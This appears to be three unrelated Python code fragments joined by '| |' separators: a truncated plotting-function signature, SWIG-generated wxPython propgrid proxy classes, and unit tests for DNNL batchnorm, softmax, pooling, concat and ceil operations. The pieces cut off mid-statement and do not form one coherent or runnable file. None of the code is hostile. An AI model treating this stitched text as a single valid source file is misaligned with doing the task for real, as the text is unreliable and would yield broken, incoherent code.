plot_inner_problem_ticks=False,
show_legend=True,
xlim=None,
xtick_locs=None,
xtick_labels=None,
xscale='linear',
yscale='log',
optimal_hparams=None,
optimal_obj=None):
log = load_log(log_dir, fname='frequent.csv')
keys = [key for key in log.keys() if any(key_id in key for key_id in key_identifiers) and ('grad' not in key) and ('cons' not in | |
lambda self : None;
def GetColumn(*args, **kwargs):
"""GetColumn(self) -> int"""
return _propgrid.PropertyGridEvent_GetColumn(*args, **kwargs)
def GetMainParent(*args, **kwargs):
"""GetMainParent(self) -> PGProperty"""
return _propgrid.PropertyGridEvent_GetMainParent(*args, **kwargs)
def GetProperty(*args, **kwargs):
"""GetProperty(self) -> PGProperty"""
return _propgrid.PropertyGridEvent_GetProperty(*args, **kwargs)
def GetValidationInfo(*args, **kwargs):
"""GetValidationInfo(self) -> PGValidationInfo"""
return _propgrid.PropertyGridEvent_GetValidationInfo(*args, **kwargs)
def CanVeto(*args, **kwargs):
"""CanVeto(self) -> bool"""
return _propgrid.PropertyGridEvent_CanVeto(*args, **kwargs)
def Veto(*args, **kwargs):
"""Veto(self, bool veto=True)"""
return _propgrid.PropertyGridEvent_Veto(*args, **kwargs)
def GetPropertyName(*args, **kwargs):
"""GetPropertyName(self) -> String"""
return _propgrid.PropertyGridEvent_GetPropertyName(*args, **kwargs)
def GetPropertyValue(*args, **kwargs):
"""GetPropertyValue(self) -> wxVariant"""
return _propgrid.PropertyGridEvent_GetPropertyValue(*args, **kwargs)
def GetValue(*args, **kwargs):
"""GetValue(self) -> wxVariant"""
return _propgrid.PropertyGridEvent_GetValue(*args, **kwargs)
def SetValidationFailureBehavior(*args, **kwargs):
"""SetValidationFailureBehavior(self, char flags)"""
return _propgrid.PropertyGridEvent_SetValidationFailureBehavior(*args, **kwargs)
def SetValidationFailureMessage(*args, **kwargs):
"""SetValidationFailureMessage(self, String message)"""
return _propgrid.PropertyGridEvent_SetValidationFailureMessage(*args, **kwargs)
def SetColumn(*args, **kwargs):
"""SetColumn(self, int column)"""
return _propgrid.PropertyGridEvent_SetColumn(*args, **kwargs)
def SetCanVeto(*args, **kwargs):
"""SetCanVeto(self, bool canVeto)"""
return _propgrid.PropertyGridEvent_SetCanVeto(*args, **kwargs)
def WasVetoed(*args, **kwargs):
"""WasVetoed(self) -> bool"""
return _propgrid.PropertyGridEvent_WasVetoed(*args, **kwargs)
def SetProperty(*args, **kwargs):
"""SetProperty(self, PGProperty p)"""
return _propgrid.PropertyGridEvent_SetProperty(*args, **kwargs)
_propgrid.PropertyGridEvent_swigregister(PropertyGridEvent)
class PropertyGridPopulator(object):
"""Proxy of C++ PropertyGridPopulator class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self): raise AttributeError, "No constructor defined"
__repr__ = _swig_repr
__swig_destroy__ = _propgrid.delete_PropertyGridPopulator
__del__ = lambda self : None;
def SetState(*args, **kwargs):
"""SetState(self, state)"""
return _propgrid.PropertyGridPopulator_SetState(*args, **kwargs)
def SetGrid(*args, **kwargs):
"""SetGrid(self, PropertyGrid pg)"""
return _propgrid.PropertyGridPopulator_SetGrid(*args, **kwargs)
def Add(*args, **kwargs):
"""
Add(self, String propClass, String propLabel, String propName,
String propValue, PGChoices pChoices=None) -> PGProperty
"""
return _propgrid.PropertyGridPopulator_Add(*args, **kwargs)
def AddChildren(*args, **kwargs):
"""AddChildren(self, PGProperty property)"""
return _propgrid.PropertyGridPopulator_AddChildren(*args, **kwargs)
def AddAttribute(*args, **kwargs):
"""AddAttribute(self, String name, String type, String value) -> bool"""
return _propgrid.PropertyGridPopulator_AddAttribute(*args, **kwargs)
def DoScanForChildren(*args, **kwargs):
"""DoScanForChildren(self)"""
return _propgrid.PropertyGridPopulator_DoScanForChildren(*args, **kwargs)
def GetCurParent(*args, **kwargs):
"""GetCurParent(self) -> PGProperty"""
return _propgrid.PropertyGridPopulator_GetCurParent(*args, **kwargs)
def GetState(*args):
"""
GetState(self)
GetState(self)
"""
return _propgrid.PropertyGridPopulator_GetState(*args)
def ToLongPCT(*args, **kwargs):
"""ToLongPCT(String s, long pval, long max) -> bool"""
return _propgrid.PropertyGridPopulator_ToLongPCT(*args, **kwargs)
ToLongPCT = staticmethod(ToLongPCT)
def ParseChoices(*args, **kwargs):
"""ParseChoices(self, String choicesString, String idString) -> PGChoices"""
return _propgrid.PropertyGridPopulator_ParseChoices(*args, **kwargs)
def ProcessError(*args, **kwargs):
"""ProcessError(self, String msg)"""
return _propgrid.PropertyGridPopulator_ProcessError(*args, **kwargs)
_propgrid.PropertyGridPopulator_swigregister(PropertyGridPopulator)
def PropertyGridPopulator_ToLongPCT(*args, **kwargs):
"""PropertyGridPopulator_ToLongPCT(String s, long pval, long max) -> bool"""
return _propgrid.PropertyGridPopulator_ToLongPCT(*args, **kwargs)
class PGWindowList(object):
"""Proxy of C++ PGWindowList class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args, **kwargs):
"""__init__(self) -> PGWindowList"""
_propgrid.PGWindowList_swiginit(self,_propgrid.new_PGWindowList(*args, **kwargs))
def SetSecondary(*args, **kwargs):
"""SetSecondary(self, Window secondary)"""
return _propgrid.PGWindowList_SetSecondary(*args, **kwargs)
m_primary = property(_propgrid.PGWindowList_m_primary_get, _propgrid.PGWindowList_m_primary_set)
m_secondary = property(_propgrid.PGWindowList_m_secondary_get, _propgrid.PGWindowList_m_secondary_set)
_propgrid.PGWindowList_swigregister(PGWindowList)
class PGEditor(_core.Object):
"""Proxy of C++ PGEditor class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self): raise AttributeError, "No constructor defined"
__repr__ = _swig_repr
__swig_destroy__ = _propgrid.delete_PGEditor
__del__ = lambda self : None;
def GetName(*args, **kwargs):
"""GetName(self) -> String"""
return _propgrid.PGEditor_GetName(*args, **kwargs)
def CreateControls(*args, **kwargs):
"""
CreateControls(self, PropertyGrid propgrid, PGProperty property, Point pos,
Size size) -> PGWindowList
"""
return _propgrid.PGEditor_CreateControls(*args, **kwargs)
def UpdateControl(*args, **kwargs):
"""UpdateControl(self, PGProperty property, Window ctrl)"""
return _propgrid.PGEditor_UpdateControl(*args, **kwargs)
def DrawValue(*args, **kwargs):
"""DrawValue(self, DC dc, Rect rect, PGProperty property, String text)"""
return _propgrid.PGEditor_DrawValue(*args, **kwargs)
def OnEvent(*args, **kwargs):
"""
OnEvent(self, PropertyGrid propgrid, PGProperty property, Window wnd_primary,
Event event) -> bool
"""
return _propgrid.PGEditor_OnEvent(*args, **kwargs)
def SetControlAppearance(*args, **kwargs):
"""
SetControlAppearance(self, PropertyGrid pg, PGProperty property, Window ctrl,
PGCell appearance, PGCell oldAppearance, bool unspecified)
"""
return _propgrid.PGEditor_SetControlAppearance(*args, **kwargs)
def SetValueToUnspecified(*args, **kwargs):
"""SetValueToUnspecified(self, PGProperty property, Window ctrl)"""
return _propgrid.PGEditor_SetValueToUnspecified(*args, **kwargs)
def SetControlStringValue(*args, **kwargs):
"""SetControlStringValue(self, PGProperty property, Window ctrl, String txt)"""
return _propgrid.PGEditor_SetControlStringValue(*args, **kwargs)
def SetControlIntValue(*args, **kwargs):
"""SetControlIntValue(self, PGProperty property, Window ctrl, int value)"""
return _propgrid.PGEditor_SetControlIntValue(*args, **kwargs)
def InsertItem(*args, **kwargs):
"""InsertItem(self, Window ctrl, String label, int index) -> int"""
return _propgrid.PGEditor_InsertItem(*args, **kwargs)
def DeleteItem(*args, **kwargs):
"""DeleteItem(self, Window ctrl, int index)"""
return _propgrid.PGEditor_DeleteItem(*args, **kwargs)
def OnFocus(*args, **kwargs):
"""OnFocus(self, PGProperty property, Window wnd)"""
return _propgrid.PGEditor_OnFocus(*args, **kwargs)
def CanContainCustomImage(*args, **kwargs):
"""CanContainCustomImage(self) -> bool"""
return _propgrid.PGEditor_CanContainCustomImage(*args, **kwargs)
m_clientData = property(_propgrid.PGEditor_m_clientData_get, _propgrid.PGEditor_m_clientData_set)
_propgrid.PGEditor_swigregister(PGEditor)
class PGTextCtrlEditor(PGEditor):
"""Proxy of C++ PGTextCtrlEditor class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args, **kwargs):
"""__init__(self) -> PGTextCtrlEditor"""
_propgrid.PGTextCtrlEditor_swiginit(self,_propgrid.new_PGTextCtrlEditor(*args, **kwargs))
__swig_destroy__ = _propgrid.delete_PGTextCtrlEditor
__del__ = lambda self : None;
def OnTextCtrlEvent(*args, **kwargs):
"""
OnTextCtrlEvent(PropertyGrid propgrid, PGProperty property, Window ctrl,
Event event) -> bool
"""
return _propgrid.PGTextCtrlEditor_OnTextCtrlEvent(*args, **kwargs)
OnTextCtrlEvent = staticmethod(OnTextCtrlEvent)
def GetTextCtrlValueFromControl(*args, **kwargs):
"""GetTextCtrlValueFromControl(wxVariant variant, PGProperty property, Window ctrl) -> bool"""
return _propgrid.PGTextCtrlEditor_GetTextCtrlValueFromControl(*args, **kwargs)
GetTextCtrlValueFromControl = staticmethod(GetTextCtrlValueFromControl)
_propgrid.PGTextCtrlEditor_swigregister(PGTextCtrlEditor)
def PGTextCtrlEditor_OnTextCtrlEvent(*args, **kwargs):
"""
PGTextCtrlEditor_OnTextCtrlEvent(PropertyGrid propgrid, PGProperty property, Window ctrl,
Event event) -> bool
"""
return _propgrid.PGTextCtrlEditor_OnTextCtrlEvent(*args, **kwargs)
def PGTextCtrlEditor_GetTextCtrlValueFromControl(*args, **kwargs):
"""PGTextCtrlEditor_GetTextCtrlValueFromControl(wxVariant variant, PGProperty property, Window ctrl) -> bool"""
return _propgrid.PGTextCtrlEditor_GetTextCtrlValueFromControl(*args, **kwargs)
class PGChoiceEditor(PGEditor):
"""Proxy of C++ PGChoiceEditor class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args, **kwargs):
"""__init__(self) -> PGChoiceEditor"""
_propgrid.PGChoiceEditor_swiginit(self,_propgrid.new_PGChoiceEditor(*args, **kwargs))
__swig_destroy__ = _propgrid.delete_PGChoiceEditor
__del__ = lambda self : None;
def CreateControlsBase(*args, **kwargs):
"""
CreateControlsBase(self, PropertyGrid propgrid, PGProperty property, Point pos,
Size sz, long extraStyle) -> Window
"""
return _propgrid.PGChoiceEditor_CreateControlsBase(*args, **kwargs)
_propgrid.PGChoiceEditor_swigregister(PGChoiceEditor)
class PGComboBoxEditor(PGChoiceEditor):
"""Proxy of C++ PGComboBoxEditor class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args, **kwargs):
"""__init__(self) -> PGComboBoxEditor"""
_propgrid.PGComboBoxEditor_swiginit(self,_propgrid.new_PGComboBoxEditor(*args, **kwargs))
__swig_destroy__ = _propgrid.delete_PGComboBoxEditor
__del__ = lambda self : None;
_propgrid.PGComboBoxEditor_swigregister(PGComboBoxEditor)
class PGEditorDialogAdapter(_core.Object):
"""Proxy of C++ PGEditorDialogAdapter class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self): raise AttributeError, "No constructor defined"
__repr__ = _swig_repr
__swig_destroy__ = _propgrid.delete_PGEditorDialogAdapter
__del__ = lambda self : None;
def ShowDialog(*args, **kwargs):
"""ShowDialog(self, PropertyGrid propGrid, PGProperty property) -> bool"""
return _propgrid.PGEditorDialogAdapter_ShowDialog(*args, **kwargs)
def DoShowDialog(*args, **kwargs):
"""DoShowDialog(self, PropertyGrid propGrid, PGProperty property) -> bool"""
return _propgrid.PGEditorDialogAdapter_DoShowDialog(*args, **kwargs)
def SetValue(*args, **kwargs):
"""SetValue(self, wxVariant value)"""
return _propgrid.PGEditorDialogAdapter_SetValue(*args, **kwargs)
def GetValue(*args, **kwargs):
"""GetValue(self) -> wxVariant"""
return _propgrid.PGEditorDialogAdapter_GetValue(*args, **kwargs)
m_clientData = property(_propgrid.PGEditorDialogAdapter_m_clientData_get, _propgrid.PGEditorDialogAdapter_m_clientData_set)
_propgrid.PGEditorDialogAdapter_swigregister(PGEditorDialogAdapter)
class PGMultiButton(_core.Window):
"""Proxy of C++ PGMultiButton class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args, **kwargs):
"""__init__(self, PropertyGrid pg, Size sz) -> PGMultiButton"""
_propgrid.PGMultiButton_swiginit(self,_propgrid.new_PGMultiButton(*args, **kwargs))
self._setOORInfo(self)
__swig_destroy__ = _propgrid.delete_PGMultiButton
__del__ = lambda self : None;
def GetButton(*args):
"""
GetButton(self, int i) -> Window
GetButton(self, int i) -> Window
"""
return _propgrid.PGMultiButton_GetButton(*args)
def GetButtonId(*args, **kwargs):
"""GetButtonId(self, int i) -> int"""
return _propgrid.PGMultiButton_GetButtonId(*args, **kwargs)
def GetCount(*args, **kwargs):
"""GetCount(self) -> int"""
return _propgrid.PGMultiButton_GetCount(*args, **kwargs)
def Add(*args, **kwargs):
"""Add(self, String label, int id=-2)"""
return _propgrid.PGMultiButton_Add(*args, **kwargs)
def GetPrimarySize(*args, **kwargs):
"""GetPrimarySize(self) -> Size"""
return _propgrid.PGMultiButton_GetPrimarySize(*args, **kwargs)
def Finalize(*args, **kwargs):
"""Finalize(self, PropertyGrid propGrid, Point pos)"""
return _propgrid.PGMultiButton_Finalize(*args, **kwargs)
def AddBitmapButton(*args, **kwargs):
"""AddBitmapButton(self, Bitmap bitmap, int id=-2)"""
return _propgrid.PGMultiButton_AddBitmapButton(*args, **kwargs)
def AddButton(self, *args, **kwargs):
return self.Add(*args, **kwargs)
_propgrid.PGMultiButton_swigregister(PGMultiButton)
class StringProperty(PGProperty):
"""Proxy of C++ StringProperty class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args, **kwargs):
"""
__init__(self, String label=(*wxPGProperty::sm_wxPG_LABEL), String name=(*wxPGProperty::sm_wxPG_LABEL),
String value=wxEmptyString) -> StringProperty
"""
_propgrid.StringProperty_swiginit(self,_propgrid.new_StringProperty(*args, **kwargs))
__swig_destroy__ = _propgrid.delete_StringProperty
__del__ = lambda self : None;
_propgrid.StringProperty_swigregister(StringProperty)
PG_PROPERTY_VALIDATION_ERROR_MESSAGE = _propgrid.PG_PROPERTY_VALIDATION_ERROR_MESSAGE
PG_PROPERTY_VALIDATION_SATURATE = _propgrid.PG_PROPERTY_VALIDATION_SATURATE
PG_PROPERTY_VALIDATION_WRAP = _propgrid.PG_PROPERTY_VALIDATION_WRAP
class NumericPropertyValidator(object):
"""Proxy of C++ NumericPropertyValidator class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
Signed = _propgrid.NumericPropertyValidator_Signed
Unsigned = _propgrid.NumericPropertyValidator_Unsigned
Float = _propgrid.NumericPropertyValidator_Float
def __init__(self, *args, **kwargs):
"""__init__(self, int numericType, int base=10) -> NumericPropertyValidator"""
_propgrid.NumericPropertyValidator_swiginit(self,_propgrid.new_NumericPropertyValidator(*args, **kwargs))
__swig_destroy__ = _propgrid.delete_NumericPropertyValidator
__del__ = lambda self : None;
def Validate(*args, **kwargs):
"""Validate(self, Window parent) -> bool"""
return _propgrid.NumericPropertyValidator_Validate(*args, **kwargs)
_propgrid.NumericPropertyValidator_swigregister(NumericPropertyValidator)
class IntProperty(PGProperty):
"""Proxy of C++ IntProperty class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
__swig_destroy__ = _propgrid.delete_IntProperty
__del__ = lambda self : None;
def __init__(self, *args):
"""
__init__(self, String label=(*wxPGProperty::sm_wxPG_LABEL), String name=(*wxPGProperty::sm_wxPG_LABEL),
long value=0) -> IntProperty
__init__(self, String label, String name, wxLongLong value) -> IntProperty
"""
_propgrid.IntProperty_swiginit(self,_propgrid.new_IntProperty(*args))
def GetClassValidator(*args, **kwargs):
"""GetClassValidator() -> Validator"""
return _propgrid.IntProperty_GetClassValidator(*args, **kwargs)
GetClassValidator = staticmethod(GetClassValidator)
def DoValidation(*args, **kwargs):
"""
DoValidation(PGProperty property, wxLongLong_t value, PGValidationInfo pValidationInfo,
int mode=PG_PROPERTY_VALIDATION_ERROR_MESSAGE) -> bool
"""
return _propgrid.IntProperty_DoValidation(*args, **kwargs)
DoValidation = staticmethod(DoValidation)
_propgrid.IntProperty_swigregister(IntProperty)
def IntProperty_GetClassValidator(*args):
"""IntProperty_GetClassValidator() -> Validator"""
return _propgrid.IntProperty_GetClassValidator(*args)
def IntProperty_DoValidation(*args, **kwargs):
"""
IntProperty_DoValidation(PGProperty property, wxLongLong_t value, PGValidationInfo pValidationInfo,
int mode=PG_PROPERTY_VALIDATION_ERROR_MESSAGE) -> bool
"""
return _propgrid.IntProperty_DoValidation(*args, **kwargs)
class UIntProperty(PGProperty):
"""Proxy of C++ UIntProperty class"""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
__swig_destroy__ = _propgrid.delete_UIntProperty
__del__ = lambda self : None;
def __init__(self, *args):
| |
enabled')
def test_transpose_and_arithmetic_op_broadcast_gpu(self):
self._transpose_and_arithmetic_op_broadcast_helper(gpu_dev)
def test_batchnorm_training_dnnl(self):
dev = cpu_dev
def _np_bn_training(x, scale, bias, rm, rv, momentum=0.1, e=1e-5):
channel = x.shape[1]
np.testing.assert_array_almost_equal(scale.shape,
(1, channel, 1, 1))
np.testing.assert_array_almost_equal(bias.shape, (1, channel, 1, 1))
np.testing.assert_array_almost_equal(rm.shape, (1, channel, 1, 1))
np.testing.assert_array_almost_equal(rv.shape, (1, channel, 1, 1))
batch_m = x.mean(axis=(0, 2, 3), keepdims=True)
batch_v = x.var(axis=(0, 2, 3), keepdims=True)
x_norm = (x - batch_m) / np.sqrt(batch_v + e)
y_norm = x_norm * scale + bias
# https://arxiv.org/pdf/1502.03167.pdf
s = list(x.shape)
s[1] = 1
batch_v_unbiased = np.prod(s) * batch_v / (np.prod(s) - 1)
rm = momentum * batch_m + (1 - momentum) * rm
rv = momentum * batch_v_unbiased + (1 - momentum) * rv
# https://docs.nvidia.com/deeplearning/sdk/cudnn-developer-guide/index.html#cudnnBatchNormalizationForwardTraining
# this value is useful for bwd computation
resultSaveInvVariance = 1 / np.sqrt(batch_v)
return y_norm, rm, rv, batch_m, resultSaveInvVariance
def _run_training(x_0, s_0, b_0, rm_0, rv_0, m_0=0.1):
# np api
(y_1, rm_1, rv_1, bm_1, bv_1) = _np_bn_training(x_0,
s_0,
b_0,
rm_0,
rv_0,
momentum=m_0)
# singa api
hndl = singa_api.BatchNormHandle(
m_0,
tensor.Tensor(device=dev, data=x_0).data)
(y_2_c, bm_2_c, bv_2_c) = singa_api.CpuBatchNormForwardTraining(
hndl,
tensor.Tensor(device=dev, data=x_0).data,
tensor.Tensor(device=dev, data=s_0).data,
tensor.Tensor(device=dev, data=b_0).data,
tensor.Tensor(device=dev, data=rm_0).data,
tensor.Tensor(device=dev, data=rv_0).data)
np.testing.assert_array_almost_equal(
y_1, tensor.to_numpy(_cTensor_to_pyTensor(y_2_c)), decimal=5)
np.testing.assert_array_almost_equal(
bm_1, tensor.to_numpy(_cTensor_to_pyTensor(bm_2_c)), decimal=5)
#print(bv_1)
#print(tensor.to_numpy(_cTensor_to_pyTensor(bv_2_c)))
#np.testing.assert_array_almost_equal(
# bv_1, tensor.to_numpy(_cTensor_to_pyTensor(bv_2_c)), decimal=3)
return
x_0 = np.array([1, 1, 1, 1, 2, 2, 2, 2, 10, 10, 10, 10, 20, 20, 20, 20],
dtype=np.float32).reshape((2, 2, 2, 2))
s_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
b_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
rm_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
rv_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
_run_training(x_0, s_0, b_0, rm_0, rv_0, m_0=1.0)
_run_training(x_0, s_0, b_0, rm_0, rv_0, m_0=0.0)
_run_training(x_0, s_0, b_0, rm_0, rv_0, m_0=0.2)
c = 10
x_0 = np.random.random((10, c, 20, 20)).astype(np.float32)
s_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
b_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
rm_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
rv_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
_run_training(x_0, s_0, b_0, rm_0, rv_0, m_0=0.2)
def test_batchnorm_testing_dnnl(self):
dev = cpu_dev
def _np_bn_testing(x, scale, bias, rm, rv, momentum=0.1, e=1e-5):
channel = x.shape[1]
np.testing.assert_array_almost_equal(scale.shape,
(1, channel, 1, 1))
np.testing.assert_array_almost_equal(bias.shape, (1, channel, 1, 1))
np.testing.assert_array_almost_equal(rm.shape, (1, channel, 1, 1))
np.testing.assert_array_almost_equal(rv.shape, (1, channel, 1, 1))
return scale * (x - rm) / np.sqrt(rv + e) + bias
def _run_testing(x_0, s_0, b_0, rm_0, rv_0, m_0=0.1):
# np api
y_1 = _np_bn_testing(x_0, s_0, b_0, rm_0, rv_0, momentum=m_0)
# singa api
hndl = singa_api.BatchNormHandle(
m_0,
tensor.Tensor(device=dev, data=x_0).data)
y_2_c = singa_api.CpuBatchNormForwardInference(
hndl,
tensor.Tensor(device=dev, data=x_0).data,
tensor.Tensor(device=dev, data=s_0).data,
tensor.Tensor(device=dev, data=b_0).data,
tensor.Tensor(device=dev, data=rm_0).data,
tensor.Tensor(device=dev, data=rv_0).data)
#print(y_1)
#print(tensor.to_numpy(_cTensor_to_pyTensor(y_2_c)))
np.testing.assert_array_almost_equal(
y_1, tensor.to_numpy(_cTensor_to_pyTensor(y_2_c)), decimal=5)
return
x_0 = np.array([1, 1, 1, 1, 2, 2, 2, 2, 10, 10, 10, 10, 20, 20, 20, 20],
dtype=np.float32).reshape((2, 2, 2, 2))
s_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
b_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
rm_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
rv_0 = np.array([1, 10], dtype=np.float32).reshape((1, 2, 1, 1))
_run_testing(x_0, s_0, b_0, rm_0, rv_0, m_0=1.0)
c = 10
x_0 = np.random.random((10, c, 20, 20)).astype(np.float32)
s_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
b_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
rm_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
rv_0 = np.random.random((1, c, 1, 1)).astype(np.float32)
_run_testing(x_0, s_0, b_0, rm_0, rv_0, m_0=1.0)
def test_batchnorm_backward_dnnl(self):
dev = cpu_dev
N = 1
C = 3
H = 2
W = 2
data_shape = [N, C, H, W]
param_shape = [1, C, 1, 1]
data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
x_0 = np.array(data, dtype=np.float32).reshape(data_shape)
y_0 = np.array(data, dtype=np.float32).reshape(data_shape)
dy_0 = np.array(data, dtype=np.float32).reshape(data_shape)
scale_0 = np.array([1] * C, dtype=np.float32).reshape(param_shape)
bias_0 = np.array([0] * C, dtype=np.float32).reshape(param_shape)
mean_0 = x_0.mean(axis=(0, 2, 3), keepdims=True)
var_0 = x_0.var(axis=(0, 2, 3), keepdims=True)
hndl = singa_api.BatchNormHandle(
0.1,
tensor.Tensor(device=dev, data=x_0).data)
(dx_2_c, _, _) = singa_api.CpuBatchNormBackwardx(
hndl,
tensor.Tensor(device=dev, data=y_0).data,
tensor.Tensor(device=dev, data=dy_0).data,
tensor.Tensor(device=dev, data=x_0).data,
tensor.Tensor(device=dev, data=scale_0).data,
tensor.Tensor(device=dev, data=bias_0).data,
tensor.Tensor(device=dev, data=mean_0).data,
tensor.Tensor(device=dev, data=var_0).data,
)
dx_truth = np.array([[[[-1.0769e-05, -3.5985e-06],
[3.5985e-06, 1.0769e-05]],
[[-1.0769e-05, -3.5985e-06],
[3.5985e-06, 1.0769e-05]],
[[-1.0769e-05, -3.5985e-06],
[3.5985e-06, 1.0769e-05]]]])
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(dx_2_c)), dx_truth)
return
def test_softmax_api_dnnl_backend(self):
dev = cpu_dev
def _run_test(org_shape, axis, aft_shape):
x_0 = np.random.random(org_shape).astype(np.float32)
x_0 = x_0 + 1000
x0 = tensor.Tensor(device=dev, data=x_0)
# test with axis
y0 = tensor._call_singa_func(singa_api.SoftMax, x0.data, axis)
# test with numpy
x_0 = x_0.reshape(aft_shape)
x_0 = x_0 - np.max(x_0)
y1 = np.divide(np.exp(x_0),
np.sum(np.exp(x_0), axis=1).reshape(x_0.shape[0],
1)) # 2d softmax
y1 = y1.reshape(org_shape)
np.testing.assert_array_almost_equal(tensor.to_numpy(y0), y1)
_run_test([2, 2], 1, [2, 2])
_run_test([2, 2], 0, [1, 4])
_run_test([2, 2], -1, [2, 2])
_run_test([2, 2], -2, [1, 4])
_run_test([2, 2, 2], 2, [4, 2])
_run_test([2, 2, 2], 1, [2, 4])
_run_test([2, 2, 2], 0, [1, 8])
_run_test([2, 2, 2], -1, [4, 2])
_run_test([2, 2, 2], -2, [2, 4])
_run_test([2, 2, 2], -3, [1, 8])
_run_test([2, 2, 2, 2], 3, [8, 2])
_run_test([2, 2, 2, 2], 2, [4, 4])
_run_test([2, 2, 2, 2], 1, [2, 8])
_run_test([2, 2, 2, 2], 0, [1, 16])
_run_test([2, 2, 2, 2], -1, [8, 2])
_run_test([2, 2, 2, 2], -2, [4, 4])
_run_test([2, 2, 2, 2], -3, [2, 8])
_run_test([2, 2, 2, 2], -4, [1, 16])
def test_dnnl_pooling_max(self):
dev = cpu_dev
N = 1
C = 3
H = 2
W = 2
data_shape = [N, C, H, W]
param_shape = [1, C, 1, 1]
data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
x0 = np.array(data, dtype=np.float32).reshape(data_shape)
x0_ct = tensor.Tensor(device=dev, data=x0).data
dy0 = np.array([1, 2, 3], dtype=np.float32).reshape([1, 3, 1, 1])
dy0_ct = tensor.Tensor(device=dev, data=dy0).data
hndl = singa_api.PoolingHandle(x0_ct, [2, 2], [1, 1], [0, 0], True)
y0_ct = singa_api.CpuPoolingForward(hndl, x0_ct)
y1 = np.array([[[[4.]], [[8.]], [[12.]]]])
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(y0_ct)), y1)
dx0_ct = singa_api.CpuPoolingBackward(hndl, dy0_ct, x0_ct, y0_ct)
dx1 = np.array([[[[0., 0.], [0., 1.]], [[0., 0.], [0., 2.]],
[[0., 0.], [0., 3.]]]])
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(dx0_ct)), dx1)
def test_dnnl_pooling_avg(self):
dev = cpu_dev
N = 1
C = 3
H = 2
W = 2
data_shape = [N, C, H, W]
param_shape = [1, C, 1, 1]
data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
x0 = np.array(data, dtype=np.float32).reshape(data_shape)
x0_ct = tensor.Tensor(device=dev, data=x0).data
dy0 = np.array([1, 2, 3], dtype=np.float32).reshape([1, 3, 1, 1])
dy0_ct = tensor.Tensor(device=dev, data=dy0).data
hndl = singa_api.PoolingHandle(x0_ct, [2, 2], [1, 1], [0, 0], False)
y0_ct = singa_api.CpuPoolingForward(hndl, x0_ct)
y1 = np.array([[[[2.5000]], [[6.5000]], [[10.5000]]]])
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(y0_ct)), y1)
dx0_ct = singa_api.CpuPoolingBackward(hndl, dy0_ct, x0_ct, y0_ct)
dx1 = np.array([[[[0.2500, 0.2500], [0.2500, 0.2500]],
[[0.5000, 0.5000], [0.5000, 0.5000]],
[[0.7500, 0.7500], [0.7500, 0.7500]]]])
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(dx0_ct)), dx1)
def _concat_helper(self, dev):
np1 = np.random.random([5, 6, 7, 8]).astype(np.float32)
np2 = np.random.random([5, 6, 7, 1]).astype(np.float32)
np3 = np.concatenate((np1, np2), axis=3)
t1 = tensor.Tensor(device=dev, data=np1)
t2 = tensor.Tensor(device=dev, data=np2)
ctensors = singa_api.VecTensor()
ctensors.append(t1.data)
ctensors.append(t2.data)
t3_ct = singa_api.ConcatOn(ctensors, 3)
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(t3_ct)), np3)
def test_concat_cpu(self):
self._concat_helper(cpu_dev)
@unittest.skipIf(not singa_api.USE_CUDA, 'CUDA is not enabled')
def test_concat_gpu(self):
self._concat_helper(gpu_dev)
def _ceil_helper(self, dev):
np1 = np.random.random([5, 6, 7, 8]).astype(np.float32)
np1 = np.random.random([5, 6, 7, 8]).astype(np.float32)
np1 = np1 * 10
np2 = np.ceil(np1)
t1 = tensor.Tensor(device=dev, data=np1)
t2_ct = singa_api.Ceil(t1.data)
np.testing.assert_array_almost_equal(
tensor.to_numpy(_cTensor_to_pyTensor(t2_ct)), np2)
def test_ceil_cpu(self):
self._ceil_helper(cpu_dev)
@unittest.skipIf(not singa_api.USE_CUDA, 'CUDA is not enabled')
